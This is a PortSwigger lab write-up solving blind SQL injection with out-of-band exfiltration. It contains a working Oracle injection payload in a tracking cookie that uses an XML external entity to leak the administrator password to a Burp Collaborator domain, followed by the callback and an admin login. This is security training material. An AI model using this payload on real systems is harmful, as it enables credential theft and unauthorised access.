Skip to content

Port Swigger Blind SQL injection with out of band 1

Blind SQL injection with out-of-band data exfiltration

Solution

Open website https://0ab8005203e5da4580c90894005f00b9.web-security-academy.net/product?productId=3

Open the website with random product "Giant Pillow Thing"
https://0ab8005203e5da4580c90894005f00b9.web-security-academy.net/product?productId=3

Generate a Burp Collaborator subdomain

Click "Copy to clipboard" on the tab: Collaborator

Subdomain:
l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com

Create a payload

'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--
--
Cookie: TrackingId=vB4vjb68ZMNoF1EE'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual--; session=f812ZxiZdRT5eVwovx6UhwrEqPqAdtOm

Response from Collaborator

Password: f7vg3n7bl1ekdsblpvdp
--
GET / HTTP/1.0
Host: f7vg3n7bl1ekdsblpvdp.l2o8ksdnqivqu9me5peo26ffy64xsoic7.oastify.com
Content-Type: text/plain; charset=utf-8

Login as user administrator

User: administrator
Password: f7vg3n7bl1ekdsblpvdp

Solved

Congratulations, you solved the lab!